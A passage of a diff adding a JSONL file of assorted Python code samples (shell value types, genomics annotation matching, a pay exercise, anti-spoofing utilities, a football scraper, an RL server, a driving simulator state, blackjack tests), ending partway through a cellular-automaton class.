diff --git "a/052.jsonl" "b/052.jsonl" new file mode 100644--- /dev/null +++ "b/052.jsonl" @@ -0,0 +1,309 @@ +{"seq_id":"408642402","text":"#!/usr/bin/env python3\n# Copyright 2016 Andy Chu. All rights reserved.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n\"\"\"\nvalue.py - Representation of runtime values.\n\"\"\"\n\n__all__ = ['TValue', 'Value']\n\n\nclass TValue(object):\n STRING = 0\n ARRAY = 1\n EMPTY_UNQUOTED = 2\n\n\nclass Value(object):\n \"\"\"\n Words evaluate to Value. Almost all words evaluate to strings, but\n \"\"\"\n def __init__(self):\n self.type = TValue.STRING # default value is empty string\n self.s = ''\n self.a = []\n\n def __repr__(self):\n if self.type == TValue.STRING:\n return '' % self.s\n elif self.type == TValue.ARRAY:\n return '' % self.a\n elif self.type == TValue.EMPTY_UNQUOTED:\n return '' % self.a\n else:\n raise AssertionError\n\n @staticmethod\n def FromString(s):\n assert isinstance(s, str), s\n v = Value()\n v.s = s\n return v\n\n @staticmethod\n def FromArray(a):\n v = Value()\n v.type = TValue.ARRAY\n v.a = a\n return v\n\n @staticmethod\n def EmptyUnquoted():\n v = Value()\n v.type = TValue.EMPTY_UNQUOTED\n return v\n\n def IsEmptyString(self):\n \"\"\"Return whether the value is an empty string.\n\n Not sure I want this EMPTY_UNQUOTED. Maybe I need a flag on raw strings:\n \"elide if whole word\" and probably \"do glob\".\n \"\"\"\n if self.type == TValue.EMPTY_UNQUOTED:\n return True\n if self.type == TValue.STRING:\n return self.s == ''\n return False\n\n def AsString(self):\n \"\"\"Return the value as a string, or false.\n\n Returns:\n is_string: bool\n s: string (or None)\n \"\"\"\n if self.type == TValue.STRING:\n assert isinstance(self.s, str), self.s\n return True, self.s\n else:\n return False, None\n\n def AsArray(self):\n \"\"\"Return the value as an array, or false.\n\n Returns:\n is_array: bool\n a: array (or None)\n \"\"\"\n if self.type == TValue.ARRAY:\n assert isinstance(self.a, list), self.a\n return True, self.a\n else:\n return False, None\n\n def IsArray(self):\n \"\"\"Used when indexing like a[@] or a[*].\"\"\"\n return self.type == TValue.ARRAY\n\n def EvalToFirst(self):\n \"\"\"Implement bash semantics, where $a evaluates to $a[0].\"\"\"\n if self.type == TValue.ARRAY:\n if len(self.a) == 0:\n # empty=() interpolates to no args\n return Value.EmptyUnquoted()\n else:\n return Value.FromString(self.a[0])\n else: # STRING\n return self\n\n def AppendTo(self, argv):\n \"\"\"Append the string value or the list values to an argv array.\"\"\"\n if self.type == TValue.STRING:\n argv.append(self.s)\n elif self.type == TValue.ARRAY:\n argv.extend(self.a)\n elif self.type == TValue.EMPTY_UNQUOTED:\n pass\n else:\n raise AssertionError\n","sub_path":"core/value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"458134294","text":"import sys, json\n\nANNOVAR_OUTPUT = 'ANNOVAR_MODIFIED_ClinVar2019_Patho_HasOMIM_Ambiguous_MGOS.tsv'\nHPOA_MIM_GENE_PAIRS = '/cluster/u/ayang/SyntheticPatients/onto/hpo/HPOA_unique_mim_gene_pairs.json'\nHPOA_ALL_GENES_PATH = '/cluster/u/ayang/SyntheticPatients/onto/hpo/HPOA_unique_genes.json'\n\nout = sys.stdout\nif len(sys.argv) > 1:\n out = open(sys.argv[1], 'w')\n\ndef extract_annovar_labeled_gene(line):\n ln = line.strip().split('\\t')\n return ln[12]\n\ndef extract_omim_from_preserved_info_field(line):\n ln = line.strip().split('\\t')[25].split(';')\n clndisdb = [x for x in ln if 'CLNDISDB=' in x][0].split('=')[-1].split(',')\n\n omim = [x for x in clndisdb if 'OMIM:' in x][0]\n\n return omim\n\ndef try_to_get_correct_genesymbol(genes):\n sep = genes.split(';')\n correct_gene = sep[0]\n for gene in sep:\n if gene in hpoa_all_genes:\n correct_gene = gene\n return correct_gene\n\nwith open(HPOA_MIM_GENE_PAIRS) as f:\n hpoa_omim_gene_pairs = set(tuple(pair) for pair in json.load(f))\n\nwith open(HPOA_ALL_GENES_PATH) as f:\n hpoa_all_genes = set(json.load(f))\n\nmatched = 0\nunmatched = 0\n\nwith open(ANNOVAR_OUTPUT) as f:\n for line in f:\n if line[0] == '#':\n print(line.strip(), file=out)\n continue\n \n annovar_labeled_gene = extract_annovar_labeled_gene(line)\n if ';' in annovar_labeled_gene:\n annovar_labeled_gene = try_to_get_correct_genesymbol(annovar_labeled_gene)\n omim = extract_omim_from_preserved_info_field(line)\n\n if tuple([omim, annovar_labeled_gene]) in hpoa_omim_gene_pairs:\n print('{}\\t{}|{}'.format(line.strip(), omim, annovar_labeled_gene), file=out)\n matched += 1\n \n else:\n print('{}\\t.'.format(line.strip()), file=out)\n unmatched += 1\n\nprint('Successfully matched {} variants from ANNOVAR output that had (OMIM, gene) pairs in HPO-A.'.format(matched))\nprint('Could not match {} variants because (OMIM, gene) pair not found in HPO-A.'.format(unmatched))\n\n\nif out != sys.stdout:\n out.close()","sub_path":"onto/clinvar/Clean/Ambiguous/MGOS/append_omim_gene_pair_to_annovar_if_possible.py","file_name":"append_omim_gene_pair_to_annovar_if_possible.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"371283534","text":"def computepay (hours, rate):\n\n rateP40 = 0.5\n reghours = 40\n\n try:\n fhours = float(shours)\n frate = float(srate)\n except :\n print('Error, please enter a numeric input')\n quit()\n\n\n if fhours > reghours:\n # Calculate Regular + Extra Pay over 40 Hours\n regpay = fhours * frate\n exthours = (fhours - reghours) * (frate * rateP40)\n\n totalpay = regpay + exthours\n else:\n # Calculate only Regular Pay\n totalpay = fhours * frate\n\n totalpayR = round(totalpay, 2)\n return totalpay\n\n\nshours = input('Enter Hours: ')\nsrate = input('Enter Rate: ')\n\ntotalpayment = computepay(hours, rate)\nprint (totalpayment)\n","sub_path":"Getting Started with Python/Exercise Files/4. Functions/Ex_4_6.py","file_name":"Ex_4_6.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"275238645","text":"# -*- coding: utf-8 -*-\n# @Time : 20-6-4 下午2:13\n# @Author : zhuying\n# @Company : Minivision\n# @File : utility.py\n# @Software : PyCharm\n\nfrom datetime import datetime\nimport os\nimport torch\nimport numpy as np\n\ndef get_time():\n return (str(datetime.now())[:-10]).replace(' ', '-').replace(':', '-')\n\n\ndef get_kernel(height, width):\n kernel_size = ((height + 15) // 16, (width + 15) // 16)\n return kernel_size\n\n\ndef get_width_height(patch_info):\n w_input = int(patch_info.split('x')[-1])\n h_input = int(patch_info.split('x')[0].split('_')[-1])\n return w_input,h_input\n\n\ndef parse_model_name(model_name):\n info = model_name.split('_')[0:-1]\n h_input, w_input = info[-1].split('x')\n model_type = model_name.split('.pth')[0].split('_')[-1]\n\n if info[0] == \"org\":\n scale = None\n else:\n scale = float(info[0])\n return int(h_input), int(w_input), model_type, scale\n\ndef parse_model_name_new_format(model_name):\n info = model_name.split('_')[0:-2]\n h_input, w_input = info[-1].split('x')\n model_type = \"MiniFASNetV1SE\"\n\n if info[0] == \"org\":\n scale = None\n else:\n scale = float(info[3])\n return int(h_input), int(w_input), model_type, scale\n\ndef make_if_not_exist(folder_path):\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\n\n\"\"\"\nUse in PyTorch.\n\"\"\"\n\ndef accuracy(output, target):\n \"\"\"Computes the accuracy for multiple binary predictions\"\"\"\n pred = output >= 0.5\n truth = target >= 0.5\n acc = pred.eq(truth).sum() / target.numel()\n return acc\n\n\nclass BinaryClassificationMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.tp = 0\n self.tn = 0\n self.fp = 0\n self.fn = 0\n self.acc = 0\n self.pre = 0\n self.rec = 0\n self.f1 = 0\n\n def update(self, pred, target):\n pred = torch.tensor(pred)\n target = torch.tensor(target)\n self.tp = pred.mul(target).sum(0).float()\n self.tn = (1 - pred).mul(1 - target).sum(0).float()\n self.fp = pred.mul(1 - target).sum(0).float()\n self.fn = (1 - pred).mul(target).sum(0).float()\n self.acc = (self.tp + self.tn).sum() / (self.tp + self.tn + self.fp + self.fn).sum()\n self.pre = self.tp / (self.tp + self.fp)\n self.rec = self.tp / (self.tp + self.fn)\n self.f1 = (2.0 * self.tp) / (2.0 * self.tp + self.fp + self.fn)\n self.avg_pre = np.nanmean(self.pre)\n self.avg_rec = np.nanmean(self.rec)\n self.avg_f1 = np.nanmean(self.f1)\n # print(\"tp, tn, fp, fn: \", self.tp.item(), self.tn.item(), self.fp.item(), self.fn.item())","sub_path":"src/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"282285189","text":"import sys\nimport requests\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\n\n###############################😎 Split LINES IN .TXT FILE & opening WEBDRIVER at the 1st Url #####################################################\n\n\nwith open('links-penalty.txt','r') as fo:\n count=0\n for line in fo:\n count+=1\n \n url=line\n from selenium import webdriver\n driver=webdriver.PhantomJS('/home/jkernel/Desktop/python books/phantomjs/bin/phantomjs',service_args=['--load-images=no','--disk-cache=true'])\n driver.get(url)\n time.sleep(3)\n \n ##################################😎 HOME TEAM CONFIG ###################################################\n search_team1_name= driver.find_element_by_css_selector('div.hostteam div.name')\n search_team2_name= driver.find_element_by_css_selector('div.guestteam div.name')\n team1_name= search_team1_name.text\n team2_name= search_team2_name.text\n \n \n \n #Typwnei ta onomata omadwn\n print(team1_name,\"-\",team2_name)\n \n #typwnei tis red cards\n try:\n \tsearch_team1_red_card= driver.find_element_by_css_selector('div.statrow:nth-of-type(2) div.value:nth-of-type(1)')\n \tteam1_red_card=search_team1_red_card.text\n \t\n \tprint(\"Home Team Red Cards: \",team1_red_card)\n \tsearch_team2_red_card= driver.find_element_by_css_selector('div.statrow:nth-of-type(2) div.value:nth-of-type(3)')\n \tteam2_red_card=search_team2_red_card.text\n \tprint(\"Away Team Red Cards: \",team2_red_card) \t\n\n except NoSuchElementException:\n \tprint(\"No red card\")\n \n \n #dokimazei ean yparxei penalty\n try:\t \n\t search_team1_penalty= driver.find_element_by_css_selector('div.penalty')\n\t if(search_team1_penalty.is_displayed()==True):\n\t \tprint(team1_penalty_scored)\n except NoSuchElementException:\n \tprint(\"No penalty found\")\n \n \n \t\n try:\n\t search_penalty_missed= driver.find_element_by_css_selector('div.miss')\n except NoSuchElementException:\n \tprint(\"No missed penalty\")\n try:\n\t search_team1_own_goal= driver.find_element_by_css_selector('div.own')\n\t owngoal=search_team1_own_goal.text\n\t print(owngoal)\n except NoSuchElementException:\n \tprint(\"No own goal\")\n \t\n\n driver.quit()\n print(\"#######################################################\") \n\n\n\n","sub_path":"match_details.py","file_name":"match_details.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"378777470","text":"# coding: utf-8\n\nimport sys\nsys.path.append(\"/opt/tiger/test_ppo\")\n\nimport tensorflow as tf\nimport os\nimport logging\nfrom collections import OrderedDict\nimport glob\nimport argparse\nfrom multiprocessing import Queue, Process\nimport zmq\n\nfrom utils import unpack\n\nfrom zSAC.Worker_SAC import Worker_Q\nfrom zSAC.Trainer_SAC import Model\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\n\ndef clean(episodic, lifelong, data_dir, postfix):\n if lifelong is not None:\n if episodic >= lifelong:\n episodic -= lifelong\n sEPID = str(episodic)\n sEPID = (8 - len(sEPID)) * \"0\" + sEPID\n pattern = os.path.join(data_dir, sEPID + \"_*.\" + postfix)\n names = glob.glob(pattern)\n for name in names:\n if os.path.exists(name):\n try:\n os.remove(name)\n except FileNotFoundError:\n pass\n\n\ndef run(**kwargs):\n tmplimit = 512\n lifelong = None\n\n server_id = kwargs.get(\"server_id\", 0)\n\n address = \"ipc:///tmp/databack%d\" % server_id\n\n SCRIPT_DIR = kwargs.get(\"SCRIPT_DIR\")\n BASE_DIR = kwargs.get(\"BASE_DIR\")\n CKPT_DIR = kwargs.get(\"CKPT_DIR\")\n DATA_DIR = kwargs.get(\"DATA_DIR\")\n\n logging.basicConfig(\n filename=os.path.join(\n BASE_DIR, \"Serverlog\"),\n level=\"INFO\")\n\n frames = kwargs.get(\"frames\", 1)\n workers = kwargs.get(\"workers\", 16)\n parallel = kwargs.get(\"worker_parallel\", 4)\n MAX_STEPS = kwargs.get(\"max_steps\", 3200)\n seqlen = kwargs.get(\"seqlen\", 32)\n burn_in = kwargs.get(\"burn_in\", 32)\n alpha = kwargs.get(\"alpha\", 1.0)\n\n games = [\"SuperMarioBros-%d-%d-v0\" % (i, j) for i in range(1, 9) for j in range(1, 5)]\n\n config = tf.ConfigProto(\n allow_soft_placement=True,\n gpu_options=tf.GPUOptions(\n per_process_gpu_memory_fraction=0.025))\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n\n phs = dict()\n\n phs[\"s\"] = tf.placeholder(dtype=tf.float32, shape=[None, None, 84, 84, frames])\n phs[\"prev_a\"] = tf.placeholder(dtype=tf.int32, shape=[None, None])\n phs[\"state_in\"] = tf.placeholder(dtype=tf.float32, shape=[None, 128 * 4 * 2])\n phs[\"slots\"] = tf.placeholder(dtype=tf.float32, shape=[None, None])\n\n with tf.device(\"/gpu\"):\n with tf.variable_scope(\"p_lstm\", reuse=tf.AUTO_REUSE):\n plstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"q_lstm\", reuse=tf.AUTO_REUSE):\n qlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"v_lstm\", reuse=tf.AUTO_REUSE):\n vlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"v_tar_lstm\", reuse=tf.AUTO_REUSE):\n vtarlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n model = Model(7, plstm, qlstm, vlstm, vtarlstm, \"agent\", **phs)\n\n saver = tf.train.Saver(max_to_keep=None, keep_checkpoint_every_n_hours=6)\n\n # while True:\n # ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n # if ckpt is not None:\n # ckpt_path = ckpt.model_checkpoint_path\n # if ckpt_path is not None:\n # break\n # sleep_time = 10\n # logging.warning(\"No Model, Sleep %d seconds\" % sleep_time)\n # time.sleep(sleep_time)\n # saver.restore(sess, ckpt_path)\n\n ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n ckpt_path = None\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n else:\n sess.run(tf.global_variables_initializer())\n\n context = zmq.Context()\n frontend = context.socket(zmq.ROUTER)\n frontend.bind(address)\n\n queue_ins = OrderedDict()\n # queue_out = Queue(maxsize=3 * tmplimit)\n for i in range(workers):\n queue_in = Queue()\n worker_id = i\n queue_ins[worker_id] = queue_in\n\n worker = Process(\n target=Worker_Q,\n args=(queue_in,\n address,\n parallel,\n BASE_DIR,\n DATA_DIR,\n 3 * tmplimit,\n server_id,\n worker_id,\n \"\\t\".join(games),\n frames,\n seqlen,\n burn_in))\n worker.daemon = True\n worker.start()\n\n while True:\n ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n if ckpt is not None:\n new_ckpt_path = ckpt.model_checkpoint_path\n if new_ckpt_path != ckpt_path:\n ckpt_path = new_ckpt_path\n saver.restore(sess, ckpt_path)\n\n fd = {model.s_t: [],\n model.previous_actions: [],\n model.state_in: []}\n\n idx, msg = frontend.recv_multipart(copy=False)\n worker_id, databack = unpack(msg)\n s, a, state_in = databack\n fd[model.s_t] = s\n fd[model.previous_actions] = a\n fd[model.state_in] = state_in\n\n _a_t_new, _state_out_batch = sess.run(\n [model.get_current_act(),\n model.state_out],\n feed_dict=fd)\n\n dataforward = (_a_t_new,\n _state_out_batch)\n queue_ins[worker_id].put(dataforward)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-SCRIPT_DIR\", type=str,\n default=\"/opt/tiger/test_ppo\")\n parser.add_argument(\"-BASE_DIR\", type=str,\n default=\"/mnt/cephfs_new_wj/arnold/labcv/xiaochangnan\"\n \"/PPOcGAE_SuperMarioBros-v0/2\")\n parser.add_argument(\"-CKPT_DIR\", type=str,\n default=\"/mnt/cephfs_new_wj/arnold/labcv/xiaochangnan\"\n \"/PPOcGAE_SuperMarioBros-v0/2/ckpt\")\n parser.add_argument(\"-DATA_DIR\", type=str,\n default=\"/mnt/mytmpfs\")\n parser.add_argument(\"-server_id\", type=int, default=0)\n parser.add_argument(\"-frames\", type=int, default=1)\n parser.add_argument(\"-workers\", type=int, default=4)\n parser.add_argument(\"-worker_parallel\", type=int, default=4)\n parser.add_argument(\"-max_steps\", type=int, default=3200)\n parser.add_argument(\"-seqlen\", type=int, default=32)\n parser.add_argument(\"-burn_in\", type=int, default=32)\n parser.add_argument(\"-alpha\", type=float, default=0.001)\n args = parser.parse_args()\n run(**args.__dict__)\n pass\n","sub_path":"zSAC/Server_SAC.py","file_name":"Server_SAC.py","file_ext":"py","file_size_in_byte":6759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"618068486","text":"import os\nimport shutil\n\ndata_dir = '/Users/luoxiaoliang/Desktop/PhD/_projects/betaextract_lss/data/sub20/'\nnum_run = 1\nnum_trial = 48\n\nfor i in range(1, num_run+1):\n for j in range(1, num_trial+1):\n output_dir = data_dir + 'run%s/output/trial%s.feat/' % (i, j)\n for f in os.listdir(output_dir):\n if f == 'stats':\n pass\n else:\n target = output_dir + f\n if os.path.isfile(target):\n os.remove(target)\n elif os.path.isdir(target):\n shutil.rmtree(target)\n\n stats_dir = data_dir + 'run%s/output/trial%s.feat/stats/' % (i, j)\n for f in os.listdir(stats_dir):\n if f == 'pe1.nii.gz':\n f_rename = \"pe1_r%s_t%s.nii.gz\" % (i, j)\n os.rename(stats_dir+f, stats_dir+f_rename)\n else:\n target = stats_dir + f\n if os.path.isfile(target):\n os.remove(target)\n elif os.path.isdir(target):\n shutil.rmtree(target)\n","sub_path":"code/get_pes_from_output.py","file_name":"get_pes_from_output.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"120028377","text":"import gym\nfrom copy import deepcopy\nimport numpy as np\nfrom gym_urbandriving.assets import TrafficLight, Terrain, Street, Lane, Sidewalk, Car, CrosswalkLight, Pedestrian\nfrom gym_urbandriving.agents import *\nimport json\nimport os\nimport random\nimport six\n\nclass PositionState:\n \"\"\"\n Abstract class representing the objects in a scene\n \"\"\"\n\n def __init__(self, data, car_model=\"kinematic\"):\n self.dimensions = (1000, 1000)\n self.dynamic_objects = {}\n self.time = 0\n self.static_objects = []\n self.start_lanes = []\n self.goal_states = []\n self.agent_config = data['agents']\n self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions = [], [], []\n self.last_coll = -1\n\n if 'state' in data['environment']:\n state_config = data['environment']['state']\n basedir = os.path.dirname(__file__)\n state_config = json.load(open(os.path.join(basedir, \"configs/\", state_config + \".json\")))\n else:\n state_config = data['environment']['state_config']\n\n for obj_info in state_config['static_objects']:\n typ = {\"Terrain\":Terrain, \"Lane\":Lane, \"Street\":Street, \"Sidewalk\":Sidewalk}[obj_info.pop('type')]\n obj = typ(**obj_info)\n self.static_objects.append(obj)\n for obj_info in state_config['car_start_lanes']:\n self.start_lanes.append(Lane(**obj_info))\n\n self.state_config = state_config\n self.goal_states = state_config['goal_states']\n\n\n\n assert (car_model in {\"kinematic\", \"point\", \"reeds_shepp\"})\n self.car_model = car_model\n self.randomize()\n return\n\n def randomize(self):\n \"\"\"\n Randomly generates car and pedestrian positions\n \"\"\"\n self.dynamic_objects = {}\n self.dynamic_objects['controlled_cars'] = {}\n self.dynamic_objects['background_cars'] = {}\n self.dynamic_objects['pedestrians'] = {}\n self.dynamic_objects['traffic_lights'] = {}\n\n for car_index in range(self.agent_config['controlled_cars']):\n while True:\n start = np.random.random_integers(0, 3)\n lane = self.start_lanes[start]\n car = lane.generate_car(self.car_model)\n if not self.is_in_collision(car):\n self.dynamic_objects['controlled_cars'][str(car_index)] = car\n self.dynamic_objects['controlled_cars'][str(car_index)].destination = self.assign_goal_states(start)\n break\n\n for car_index in range(self.agent_config['background_cars']):\n while True:\n start = np.random.random_integers(0, 3)\n lane = self.start_lanes[start]\n car = lane.generate_car(self.car_model)\n if not self.is_in_collision(car):\n self.dynamic_objects['background_cars'][str(car_index)] = car\n self.dynamic_objects['background_cars'][str(car_index)].destination = self.assign_goal_states(start)\n break\n\n self.dynamic_objects['traffic_lights'] = {}\n if self.agent_config['use_traffic_lights']:\n\n for i, traffic_light in enumerate(self.state_config['traffic_lights']):\n self.dynamic_objects['traffic_lights'][str(i)] = TrafficLight(**traffic_light)\n self.dynamic_objects['crosswalk_lights'] = {}\n self.dynamic_objects['pedestrians'] = {} \n if self.agent_config['number_of_pedestrians']:\n for i, crosswalk_light in enumerate(self.state_config['crosswalk_lights']):\n self.dynamic_objects['crosswalk_lights'][str(i)] = CrosswalkLight(**crosswalk_light)\n\n start_sidewalks = [s for s in self.static_objects if type(s) == Sidewalk]\n\n for ped_index in range(self.agent_config['number_of_pedestrians']):\n while True:\n start = np.random.random_integers(0, len(start_sidewalks) - 1)\n sidewalk = start_sidewalks[start]\n ped = sidewalk.generate_man()\n if not self.is_in_collision(ped):\n self.dynamic_objects['pedestrians'][str(ped_index)] = ped\n break\n #TODO Add pedestrians\n\n self.create_agents()\n\n def assign_goal_states(self, start_lane):\n \"\"\"\n Assigns a random goal state to a car\n \"\"\"\n goal_choices = deepcopy(self.goal_states)\n del goal_choices[start_lane]\n choice = random.choice(goal_choices)\n\n return [choice['x'], choice['y'], choice['vel'], np.deg2rad(choice['angle_deg'])]\n\n def create_agents(self):\n \"\"\"\n Creates agents for objects in the scene\n \"\"\"\n agent_mappings = {}\n for k, v in six.iteritems(self.agent_config['agent_mappings']):\n agent_mappings[{\"Car\":Car,\n \"TrafficLight\":TrafficLight,\n \"CrosswalkLight\":CrosswalkLight,\n \"Pedestrian\":Pedestrian}[k]] = {\"PlanningPursuitAgent\":PlanningPursuitAgent,\n \"TrafficLightAgent\":TrafficLightAgent,\n \"CrosswalkLightAgent\":CrosswalkLightAgent,\n \"Agent\": Agent,\n \"PedestrianAgent\":PedestrianAgent,\n \"NeuralPursuitAgent\":lambda i:NeuralPursuitAgent(i,\n noise=self.agent_config['bg_state_space_config']['noise'],\n omission_prob=self.agent_config['bg_state_space_config']['omission_prob'])}[v]\n\n self.bg_agents = {}\n for key in self.dynamic_objects.keys():\n if not key == 'controlled_cars':\n self.bg_agents[key] = []\n for i, index in enumerate(self.dynamic_objects[key]):\n obj = self.dynamic_objects[key][index]\n if type(obj) in agent_mappings:\n self.bg_agents[key].append(agent_mappings[type(obj)](i))\n self.bg_agents['controlled_cars'] = []\n for i in range(self.agent_config['controlled_cars']):\n action_space = self.agent_config['action_space']\n agent = {'steering':SteeringActionAgent,\n 'velocity':VelocityActionAgent,\n 'trajectory':TrajectoryActionAgent}[action_space](i)\n self.bg_agents['controlled_cars'].append(agent)\n\n def is_in_collision(self,car):\n\n for obj in self.static_objects:\n if car.collides(obj):\n return True\n for key in self.dynamic_objects.keys():\n for i,obj in six.iteritems(self.dynamic_objects[key]):\n if car.collides(obj):\n return True\n return False\n\n\n def get_collisions(self):\n \"\"\"\n Get list of all collisions in this state\n\n Returns\n -------\n list\n List of tuples, where each tuple contains a pair of coliding object indices. Dynamic_collisions contains collisions between cars and other cars.\n list\n The corresponding list for collisions between dynamic objects and static objects\n \"\"\"\n if self.last_coll == self.time:\n return self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions\n self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions = [], [], []\n self.last_coll = self.time\n\n #TODO Fix this. Controlled cars can't collide with background cars\n for key in self.dynamic_objects.keys():\n for i, dobj in self.dynamic_objects[key].items():\n i = int(i)\n\n for j, sobj in enumerate(self.static_objects):\n if dobj.collides(sobj):\n self.static_collisions.append([i, j, key, 'static'])\n\n for inner_key in self.dynamic_objects.keys():\n for j, dobj1 in self.dynamic_objects[inner_key].items():\n j = int(j)\n if (not (i == j and key == inner_key)) and dobj.collides(dobj1):\n self.dynamic_collisions.append([i, j,key, inner_key])\n if key == 'controlled_cars':\n self.controlled_car_collisions.append([i, j,key, inner_key])\n\n return self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions\n\n\n def collides_any(self, agentnum,type_of_agent = 'background_cars'):\n \"\"\"\n Returns if the agentnum object in the scene is colliding with any other object\n\n Parameters\n ----------\n agentnum : int\n The index of the object to query\n\n Returns\n -------\n bool\n True if this object is colliding\n \"\"\"\n\n dynamic_collisions, static_collisions, _ = self.get_collisions()\n for coll in dynamic_collisions:\n id1, id2, t1, t2 = coll\n if (agentnum, type_of_agent) in [(id1, t1), (id2, t2)]:\n return True\n for coll in static_collisions:\n id1, id2, t1, t2 = coll\n if (agentnum, type_of_agent) is (id1, t1):\n return True\n return False\n\n def collides_any_dynamic(self, agentnum,type_of_agent = 'background_cars'):\n dynamic_collisions, static_collisions, _ = self.get_collisions()\n\n for coll in dynamic_collisions:\n id1, id2, t1, t2 = coll\n if (agentnum, type_of_agent) in [(id1, t1), (id2, t2)]:\n return True\n\n return False\n\n def min_dist_to_coll(self, agentnum,type_of_agent = 'background_cars'):\n \"\"\"\n Returns the minimum distance between the object with id agentnum and a collideable object.\n\n Parameters\n ----------\n agentnum : int\n The index of the object to query\n\n Returns\n -------\n float\n Distance to nearest collideable object\n \"\"\"\n min_dist = np.finfo('f').max\n obj = self.dynamic_objects[type_of_agent][agentnum]\n for j, sobj in enumerate(self.static_objects):\n if obj.can_collide(sobj):\n min_dist = min(min_dist, obj.dist_to(sobj))\n\n for key in self.dynamic_objects.keys():\n for j, dobj in enumerate(self.dynamic_objects):\n if j != agentnum and obj.can_collide(dobj):\n min_dist = min(min_dist, obj.dist_to(dobj))\n return min_dist\n\n def get_observations(self, observation_type):\n \"\"\"\n Returns a set\n\n Parameters\n ----------\n agentnum : int\n The index of the object to query\n\n Returns\n -------\n float\n Distance to nearest collideable object\n \"\"\"\n","sub_path":"gym_urbandriving/state/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":11222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"146690334","text":"from blackjack.dealer import Dealer\nfrom blackjack.card import Card\nfrom blackjack.hand import Hand\nfrom blackjack.game_options import GameOptions\nfrom blackjack.game import Game\n\n\ndef test_dealer_hit():\n hand = Hand(0, [Card(\"6\", \"clubs\"), Card(\"5\", \"hearts\")])\n dealer = Dealer()\n\n dealer.hand = hand\n\n assert dealer.hit()\n\n\ndef test_dealer_does_not_hit():\n hand = Hand(0, [Card(\"10\", \"clubs\"), Card(\"7\", \"hearts\")])\n dealer = Dealer()\n\n dealer.hand = hand\n\n assert not dealer.hit()\n\n\ndef test_dealer_hits_soft_17():\n hand = Hand(0, [Card(\"6\", \"clubs\"), Card(\"A\", \"hearts\")])\n dealer = Dealer(hit_soft_17=True)\n\n dealer.hand = hand\n\n assert dealer.hit()\n\n\ndef test_dealer_takes_hit():\n options = GameOptions()\n new_game = Game(options, \"Alan\")\n new_game.dealer.hand = Hand(10, [Card(\"2\", \"spades\"), Card(\"J\", \"clubs\")])\n new_game.dealer.takes_hit(new_game.deck.deal())\n","sub_path":"blackjack/tests/test_dealer.py","file_name":"test_dealer.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"529116272","text":"class Logger:\n \"\"\"Logger class. Use to log information and warnings\"\"\"\n def logToConsole(level, text, newline = False):\n if newline:\n print(\"\\n\" + level + \"\" + text)\n else:\n print(level + \"\" + text)\n\n def logValue(value):\n Logger.logToConsole(LogLevel.info, str(value))\n\nclass LogLevel:\n \"\"\"LogLevel\"\"\"\n info = \"[Info] \"\n danger = \"[Danger] \"\n severe = \"[Severe] \"\n success = \"[Success] \"\n","sub_path":"modules/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"90974441","text":"import numpy as np\nfrom itertools import product\nimport re\n\n\nRULES = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 18, 19, 22, 23, 24, 25, 26, 27, 28, 29, 30, 32, 33, \n 34, 35, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 50, 51, 54, 56, 57, 58, 60, 62, 72, 73, 74, 76, 77, 78, \n 90, 94, 104, 105, 106, 108, 110, 122, 126, 128, 130, 132, 134, 136, 138, 140, 142, 146, 150, 152, 154, 156, \n 160, 162, 164, 168, 170, 172, 178, 184, 200, 204, 232]\n\n\nclass preimage_ECA():\n def __init__(self, rule):\n self.wolfram = np.binary_repr(rule, 8)\n \n 